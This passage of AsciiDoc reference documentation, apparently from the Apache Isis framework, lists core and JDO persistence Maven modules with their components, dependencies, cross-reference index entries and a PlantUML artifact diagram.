xref:refguide:applib:index\/services\/metrics\/MetricsService.adoc[MetricsService], xref:refguide:applib:index\/services\/publishing\/log\/CommandLogger.adoc[CommandLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityChangesLogger.adoc[EntityChangesLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityPropertyChangeLogger.adoc[EntityPropertyChangeLogger], xref:refguide:applib:index\/services\/publishing\/log\/ExecutionLogger.adoc[ExecutionLogger], xref:refguide:applib:index\/services\/publishing\/spi\/CommandSubscriber.adoc[CommandSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChanges.adoc[EntityChanges], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChangesSubscriber.adoc[EntityChangesSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChange.adoc[EntityPropertyChange], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChangeSubscriber.adoc[EntityPropertyChangeSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/ExecutionSubscriber.adoc[ExecutionSubscriber], xref:refguide:applib:index\/services\/queryresultscache\/MethodReferences.adoc[MethodReferences], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCache.adoc[QueryResultsCache], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCacheControl.adoc[QueryResultsCacheControl], xref:refguide:applib:index\/services\/registry\/InstanceByPriorityComparator.adoc[InstanceByPriorityComparator], xref:refguide:applib:index\/services\/registry\/ServiceRegistry.adoc[ServiceRegistry], xref:refguide:applib:index\/services\/repository\/EntityState.adoc[EntityState], xref:refguide:applib:index\/services\/repository\/RepositoryService.adoc[RepositoryService], xref:refguide:applib:index\/services\/routing\/RoutingService.adoc[RoutingService], xref:refguide:applib:index\/services\/scratchpad\/Scratchpad.adoc[Scratchpad], xref:refguide:applib:index\/services\/session\/SessionLoggingService.adoc[SessionLoggingService], xref:refguide:applib:index\/services\/session\/SessionLoggingServiceLogging.adoc[SessionLoggingServiceLogging], xref:refguide:applib:index\/services\/sudo\/SudoService.adoc[SudoService], xref:refguide:applib:index\/services\/swagger\/Format.adoc[Format], xref:refguide:applib:index\/services\/swagger\/SwaggerService.adoc[SwaggerService], xref:refguide:applib:index\/services\/swagger\/Visibility.adoc[Visibility], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderForCollectionTypeAbstract.adoc[TableColumnOrderForCollectionTypeAbstract], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderService.adoc[TableColumnOrderService], xref:refguide:applib:index\/services\/title\/TitleService.adoc[TitleService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingService.adoc[UrlEncodingService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingServiceUsingBaseEncodingAbstract.adoc[UrlEncodingServiceUsingBaseEncodingAbstract], xref:refguide:applib:index\/services\/user\/RoleMemento.adoc[RoleMemento], xref:refguide:applib:index\/services\/user\/UserMemento.adoc[UserMemento], xref:refguide:applib:index\/services\/user\/UserService.adoc[UserService], xref:refguide:applib:index\/services\/userprof\/UserProfileService.adoc[UserProfileService], xref:refguide:applib:index\/services\/userreg\/EmailNotificationService.adoc[EmailNotificationService], xref:refguide:applib:index\/services\/userreg\/UserDetails.adoc[UserDetails], xref:refguide:applib:index\/services\/userreg\/UserRegistrationService.adoc[UserRegistrationService], xref:refguide:applib:index\/services\/userreg\/events\/EmailEventAbstract.adoc[EmailEventAbstract], xref:refguide:applib:index\/services\/userreg\/events\/EmailRegistrationEvent.adoc[EmailRegistrationEvent], xref:refguide:applib:index\/services\/userreg\/events\/PasswordResetEvent.adoc[PasswordResetEvent], xref:refguide:applib:index\/services\/wrapper\/DisabledException.adoc[DisabledException], xref:refguide:applib:index\/services\/wrapper\/HiddenException.adoc[HiddenException], xref:refguide:applib:index\/services\/wrapper\/InvalidException.adoc[InvalidException], xref:refguide:applib:index\/services\/wrapper\/WrapperFactory.adoc[WrapperFactory], xref:refguide:applib:index\/services\/wrapper\/WrappingObject.adoc[WrappingObject], xref:refguide:applib:index\/services\/wrapper\/control\/AsyncControl.adoc[AsyncControl], xref:refguide:applib:index\/services\/wrapper\/control\/ControlAbstract.adoc[ControlAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandler.adoc[ExceptionHandler], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandlerAbstract.adoc[ExceptionHandlerAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExecutionMode.adoc[ExecutionMode], xref:refguide:applib:index\/services\/wrapper\/control\/SyncControl.adoc[SyncControl], xref:refguide:applib:index\/services\/wrapper\/events\/AccessEvent.adoc[AccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionArgumentEvent.adoc[ActionArgumentEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionInvocationEvent.adoc[ActionInvocationEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionUsabilityEvent.adoc[ActionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionVisibilityEvent.adoc[ActionVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAccessEvent.adoc[CollectionAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAddToEvent.adoc[CollectionAddToEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionMethodEvent.adoc[CollectionMethodEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionRemoveFromEvent.adoc[CollectionRemoveFromEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionUsabilityEvent.adoc[CollectionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/InteractionEvent.adoc[InteractionEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectTitleEvent.adoc[ObjectTitleEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectValidityEvent.adoc[ObjectValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectVisibilityEvent.adoc[ObjectVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ParseValueEvent.adoc[ParseValueEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyAccessEvent.adoc[PropertyAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyModifyEvent.adoc[PropertyModifyEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyUsabilityEvent.adoc[PropertyUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyVisibilityEvent.adoc[PropertyVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ProposedHolderEvent.adoc[ProposedHolderEvent], xref:refguide:applib:index\/services\/wrapper\/events\/UsabilityEvent.adoc[UsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ValidityEvent.adoc[ValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/VisibilityEvent.adoc[VisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionAdapter.adoc[InteractionAdapter], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionListener.adoc[InteractionListener], xref:refguide:applib:index\/services\/xactn\/TransactionId.adoc[TransactionId], xref:refguide:applib:index\/services\/xactn\/TransactionService.adoc[TransactionService], xref:refguide:applib:index\/services\/xactn\/TransactionState.adoc[TransactionState], xref:refguide:applib:index\/services\/xactn\/TransactionalProcessor.adoc[TransactionalProcessor], xref:refguide:applib:index\/services\/xml\/XmlService.adoc[XmlService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService.adoc[XmlSnapshotService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot.adoc[XmlSnapshotService.Snapshot], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot~Builder.adoc[XmlSnapshotService.Snapshot.Builder], xref:refguide:applib:index\/snapshot\/SnapshottableWithInclusions.adoc[SnapshottableWithInclusions], xref:refguide:applib:index\/spec\/AbstractSpecification.adoc[AbstractSpecification], xref:refguide:applib:index\/spec\/AbstractSpecification2.adoc[AbstractSpecification2], xref:refguide:applib:index\/spec\/Specification.adoc[Specification], xref:refguide:applib:index\/spec\/Specification2.adoc[Specification2], xref:refguide:applib:index\/spec\/SpecificationAnd.adoc[SpecificationAnd], xref:refguide:applib:index\/spec\/SpecificationNot.adoc[SpecificationNot], xref:refguide:applib:index\/spec\/SpecificationOr.adoc[SpecificationOr], xref:refguide:applib:index\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:applib:index\/types\/MemberIdentifierType.adoc[MemberIdentifierType], xref:refguide:applib:index\/types\/TargetActionType.adoc[TargetActionType], xref:refguide:applib:index\/types\/TargetClassType.adoc[TargetClassType], xref:refguide:applib:index\/util\/Enums.adoc[Enums], xref:refguide:applib:index\/util\/Equality.adoc[Equality], xref:refguide:applib:index\/util\/Hashing.adoc[Hashing], xref:refguide:applib:index\/util\/JaxbUtil.adoc[JaxbUtil], xref:refguide:applib:index\/util\/ObjectContracts.adoc[ObjectContracts], xref:refguide:applib:index\/util\/ReasonBuffer.adoc[ReasonBuffer], xref:refguide:applib:index\/util\/ReasonBuffer2.adoc[ReasonBuffer2], xref:refguide:applib:index\/util\/Reasons.adoc[Reasons], xref:refguide:applib:index\/util\/TitleBuffer.adoc[TitleBuffer], xref:refguide:applib:index\/util\/TitleBufferException.adoc[TitleBufferException], xref:refguide:applib:index\/util\/ToString.adoc[ToString], xref:refguide:applib:index\/util\/schema\/ChangesDtoUtils.adoc[ChangesDtoUtils], xref:refguide:applib:index\/util\/schema\/CommandDtoUtils.adoc[CommandDtoUtils], xref:refguide:applib:index\/util\/schema\/CommonDtoUtils.adoc[CommonDtoUtils], xref:refguide:applib:index\/util\/schema\/InteractionDtoUtils.adoc[InteractionDtoUtils], xref:refguide:applib:index\/util\/schema\/MemberExecutionDtoUtils.adoc[MemberExecutionDtoUtils], xref:refguide:applib:index\/value\/Blob.adoc[Blob], xref:refguide:applib:index\/value\/Clob.adoc[Clob], xref:refguide:applib:index\/value\/HasHtml.adoc[HasHtml], xref:refguide:applib:index\/value\/LocalResourcePath.adoc[LocalResourcePath], xref:refguide:applib:index\/value\/Markup.adoc[Markup], xref:refguide:applib:index\/value\/NamedWithMimeType.adoc[NamedWithMimeType], xref:refguide:applib:index\/value\/OpenUrlStrategy.adoc[OpenUrlStrategy], xref:refguide:applib:index\/value\/Password.adoc[Password]\n****\n\n|Apache Isis Core - Code Gen (ByteBuddy)\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-codegen-bytebuddy\nType: jar\nDirectory: \/core\/codegen-bytebuddy\n----\n|Code generation using ByteBuddy.\n\n.Components\n****\no.a.i.core.codegen.bytebuddy.services.ProxyFactoryServiceByteBuddy +\n****\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.objenesis:objenesis:jar:<managed> +\n****\n\n|Apache Isis Core - Configuration\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-config\nType: jar\nDirectory: \/core\/config\n----\n|Isis configuration library for framework internal use.\n\n.Components\n****\no.a.i.core.config.applib.RestfulPathProvider +\no.a.i.core.config.beans.IsisBeanFactoryPostProcessorForSpring +\no.a.i.core.config.beans.IsisBeanTypeRegistryDefault +\no.a.i.core.config.converters.PatternsConverter +\no.a.i.core.config.datasources.DataSourceIntrospectionService +\no.a.i.core.config.environment.IsisLocaleInitializer +\no.a.i.core.config.environment.IsisSystemEnvironment +\no.a.i.core.config.environment.IsisTimeZoneInitializer +\no.a.i.core.config.validators.PatternOptionalStringConstraintValidator +\no.a.i.core.config.viewer.wicket.WebAppContextPath +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/config\/datasources\/DataSourceIntrospectionService.adoc[DataSourceIntrospectionService]\n****\n\n|Apache Isis Core - Interaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-interaction\nType: jar\nDirectory: \/core\/interaction\n----\n|Provides _Interaction Scope_.\nTop level action execution or property changes are wrapped in an _Interaction_.\nThat typically corresponds to a http request\/response cycle or a JUnit test method execution.\n\n.Components\n****\no.a.i.core.interaction.integration.InteractionAwareTransactionalBoundaryHandler +\no.a.i.core.interaction.scope.InteractionScopeBeanFactoryPostProcessor +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/interaction\/session\/InteractionFactory.adoc[InteractionFactory]\n****\n\n|Apache Isis Core - Unit Test Support\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-internaltestsupport\nType: jar\nDirectory: \/core\/internaltestsupport\n----\n|Support for writing unit tests in either JUnit 4 or JUnit 5; should be added as a dependency with scope=test only\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mockito:mockito-core:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n|Apache Isis Core - MetaModel\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-metamodel\nType: jar\nDirectory: \/core\/metamodel\n----\n|.Components\n****\no.a.i.core.metamodel.facets.schema.IsisSchemaMetaModelRefiner +\no.a.i.core.metamodel.facets.schema.IsisSchemaValueTypeProvider +\no.a.i.core.metamodel.objectmanager.ObjectManagerDefault +\no.a.i.core.metamodel.progmodel.ProgrammingModelInitFilterDefault +\no.a.i.core.metamodel.services.ServiceInjectorDefault +\no.a.i.core.metamodel.services.appfeat.ApplicationFeatureRepositoryDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForCollections +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForDomainObjects +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorRegistry +\no.a.i.core.metamodel.services.events.MetamodelEventService +\no.a.i.core.metamodel.services.exceprecog.ExceptionRecognizerForRecoverableException +\no.a.i.core.metamodel.services.grid.GridLoaderServiceDefault +\no.a.i.core.metamodel.services.grid.GridReaderUsingJaxb +\no.a.i.core.metamodel.services.grid.GridServiceDefault +\no.a.i.core.metamodel.services.grid.bootstrap3.GridSystemServiceBS3 +\no.a.i.core.metamodel.services.layout.LayoutServiceDefault +\no.a.i.core.metamodel.services.metamodel.MetaModelServiceDefault +\no.a.i.core.metamodel.services.registry.ServiceRegistryDefault +\no.a.i.core.metamodel.services.tablecol.TableColumnOrderServiceDefault +\no.a.i.core.metamodel.services.title.TitleServiceDefault +\no.a.i.core.metamodel.specloader.InjectorMethodEvaluatorDefault +\no.a.i.core.metamodel.specloader.ProgrammingModelServiceDefault +\no.a.i.core.metamodel.specloader.SpecificationLoaderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForBuiltin +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForCollections +\no.a.i.core.metamodel.valuetypes.ValueTypeRegistry +\n****\n\n.Dependencies\n****\nio.swagger:swagger-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/metamodel\/services\/command\/CommandDtoFactory.adoc[CommandDtoFactory], xref:refguide:core:index\/metamodel\/services\/ixn\/InteractionDtoFactory.adoc[InteractionDtoFactory], xref:refguide:core:index\/metamodel\/services\/publishing\/CommandPublisher.adoc[CommandPublisher], xref:refguide:core:index\/metamodel\/services\/publishing\/ExecutionPublisher.adoc[ExecutionPublisher]\n****\n\n|Apache Isis Core - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtime\nType: jar\nDirectory: \/core\/runtime\n----\n|Bundles framework internal services, utilities and events.\n\n.Components\n****\no.a.i.core.runtime.events.MetamodelEventService +\no.a.i.core.runtime.events.TransactionEventEmitter +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\n****\n\n|Apache Isis Core - Runtime Services\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtimeservices\nType: jar\nDirectory: \/core\/runtimeservices\n----\n|Introduced to keep the 'runtime' package concise. Viewers don't have dependencies on this module.\n\n.Components\n****\no.a.i.core.runtimeservices.bookmarks.BookmarkServiceDefault +\no.a.i.core.runtimeservices.clock.ClockServiceDefault +\no.a.i.core.runtimeservices.command.CommandDtoFactoryDefault +\no.a.i.core.runtimeservices.command.CommandExecutorServiceDefault +\no.a.i.core.runtimeservices.confmenu.ConfigurationViewServiceDefault +\no.a.i.core.runtimeservices.email.EmailServiceDefault +\no.a.i.core.runtimeservices.eventbus.EventBusServiceSpring +\no.a.i.core.runtimeservices.executor.MemberExecutorServiceDefault +\no.a.i.core.runtimeservices.factory.FactoryServiceDefault +\no.a.i.core.runtimeservices.homepage.HomePageResolverServiceDefault +\no.a.i.core.runtimeservices.i18n.po.TranslationServicePo +\no.a.i.core.runtimeservices.interaction.InteractionDtoFactoryDefault +\no.a.i.core.runtimeservices.jaxb.JaxbServiceDefault +\no.a.i.core.runtimeservices.menubars.MenuBarsLoaderServiceDefault +\no.a.i.core.runtimeservices.menubars.bootstrap3.MenuBarsServiceBS3 +\no.a.i.core.runtimeservices.message.MessageServiceDefault +\no.a.i.core.runtimeservices.publish.CommandPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityChangesPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityPropertyChangePublisherDefault +\no.a.i.core.runtimeservices.publish.ExecutionPublisherDefault +\no.a.i.core.runtimeservices.queryresultscache.QueryResultsCacheDefault +\no.a.i.core.runtimeservices.recognizer.ExceptionRecognizerServiceDefault +\no.a.i.core.runtimeservices.recognizer.dae.ExceptionRecognizerForDataAccessException +\no.a.i.core.runtimeservices.repository.RepositoryServiceDefault +\no.a.i.core.runtimeservices.routing.RoutingServiceDefault +\no.a.i.core.runtimeservices.scratchpad.ScratchpadDefault +\no.a.i.core.runtimeservices.session.InteractionFactoryDefault +\no.a.i.core.runtimeservices.sudo.SudoServiceDefault +\no.a.i.core.runtimeservices.transaction.TransactionServiceSpring +\no.a.i.core.runtimeservices.urlencoding.UrlEncodingServiceWithCompression +\no.a.i.core.runtimeservices.user.UserServiceDefault +\no.a.i.core.runtimeservices.userprof.UserProfileServiceDefault +\no.a.i.core.runtimeservices.userreg.EmailNotificationServiceDefault +\no.a.i.core.runtimeservices.wrapper.WrapperFactoryDefault +\no.a.i.core.runtimeservices.xml.XmlServiceDefault +\no.a.i.core.runtimeservices.xmlsnapshot.XmlSnapshotServiceDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/runtimeservices\/transaction\/TransactionServiceSpring.adoc[TransactionServiceSpring], xref:refguide:core:index\/runtimeservices\/xml\/XmlServiceDefault.adoc[XmlServiceDefault]\n****\n\n|Apache Isis Core - Security\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-security\nType: jar\nDirectory: \/core\/security\n----\n|.Components\n****\no.a.i.core.security.authentication.manager.AuthenticationManager +\no.a.i.core.security.authentication.standard.RandomCodeGeneratorDefault +\no.a.i.core.security.authorization.manager.AuthorizationManager +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/security\/authentication\/Authentication.adoc[Authentication], xref:refguide:core:index\/security\/authentication\/AuthenticationRequest.adoc[AuthenticationRequest], xref:refguide:core:index\/security\/authentication\/Authenticator.adoc[Authenticator], xref:refguide:core:index\/security\/authorization\/Authorizor.adoc[Authorizor]\n****\n\n|Apache Isis Core - Transaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-transaction\nType: jar\nDirectory: \/core\/transaction\n----\n|Provides transaction integration with Spring and also\nentity change tracking, with associated publishing and pre\/post value events.\n\n.Components\n****\no.a.i.core.transaction.changetracking.EntityChangeTrackerDefault +\no.a.i.core.transaction.changetracking.events.TimestampService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/transaction\/changetracking\/EntityChangeTracker.adoc[EntityChangeTracker], xref:refguide:core:index\/transaction\/changetracking\/EntityChangeTrackerDefault.adoc[EntityChangeTrackerDefault], xref:refguide:core:index\/transaction\/changetracking\/EntityChangesPublisher.adoc[EntityChangesPublisher], xref:refguide:core:index\/transaction\/changetracking\/EntityPropertyChangePublisher.adoc[EntityPropertyChangePublisher], xref:refguide:core:index\/transaction\/events\/TransactionAfterCompletionEvent.adoc[TransactionAfterCompletionEvent]\n****\n\n|Apache Isis Core - WebApp\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-webapp\nType: jar\nDirectory: \/core\/webapp\n----\n|Bundles all the web specific classes a srequired by viewers.\nIntroduced to keep the 'runtime' package concise.\n\n.Components\n****\no.a.i.core.webapp.health.HealthIndicatorUsingHealthCheckService +\no.a.i.core.webapp.modules.logonlog.WebModuleLogOnExceptionLogger +\no.a.i.core.webapp.modules.templresources.WebModuleTemplateResources +\no.a.i.core.webapp.webappctx.IsisWebAppContextInitializer +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\norg.springframework.boot:spring-boot:jar:<managed> +\norg.springframework.boot:spring-boot-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-thymeleaf:jar:<managed> +\n****\n\n|Apache Isis - JDK Supplemental\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-jdk-supplemental\nType: pom\nDirectory: \/core\/jdk-supplemental\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed with later JDK versions.\n\nWill be removed once the framework migrates to Java 11 as the required\nminimum version.\n\n.Dependencies\n****\ncom.fasterxml.woodstox:woodstox-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-impl:jar:<managed> +\ncom.sun.xml.ws:jaxws-ri:pom:<managed> +\ncom.sun.xml.ws:jaxws-rt:jar:${jaxws-ri.version} +\njavax.xml.bind:jaxb-api:jar:<managed> +\norg.codehaus.woodstox:stax2-api:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.moxy:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.sdo:jar:<managed> +\n****\n\n|Apache Isis Core - Schemas\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-schema\nType: jar\nDirectory: \/api\/schema\n----\n|Apache Isis schemas, for conversion into canonical DTOs (for use in integration scenarios).\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:schema:index\/IsisModuleSchema.adoc[IsisModuleSchema]\n****\n|===\n\n== Persistence\n\n=== JDO\n\n[plantuml,JDO,svg]\n----\n@startuml(id=JDO)\ntitle JDO - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JDO\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JDO (Spring)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Persistence - JDO (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JDO (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JDO (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JDO (provider)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Persistence - JDO Provider (DataNucleus)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JDO)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo\nType: pom\nDirectory: \/persistence\/jdo\n----\n|Supplementary applib for JDO persistence\n\n|Apache Isis Persistence - JDO (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-applib\nType: jar\nDirectory: \/persistence\/jdo\/applib\n----\n|Supplementary applib for JDO persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/applib\/IsisModulePersistenceJdoApplib.adoc[IsisModulePersistenceJdoApplib], xref:refguide:persistence:index\/jdo\/applib\/services\/JdoSupportService.adoc[JdoSupportService]\n****\n\n|Apache Isis Persistence - JDO Provider (DataNucleus)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-datanucleus\nType: jar\nDirectory: \/persistence\/jdo\/datanucleus\n----\n|JDO Implementation (powered by DataNucleus)\n\n.Components\n****\no.a.i.persistence.jdo.datanucleus.config.DnEntityDiscoveryListener +\no.a.i.persistence.jdo.datanucleus.entities.DnEntityStateProvider +\no.a.i.persistence.jdo.datanucleus.jdosupport.JdoSupportServiceDefault +\no.a.i.persistence.jdo.datanucleus.metamodel.JdoDataNucleusProgrammingModel +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-integration:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.datanucleus:datanucleus-api-jdo:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> 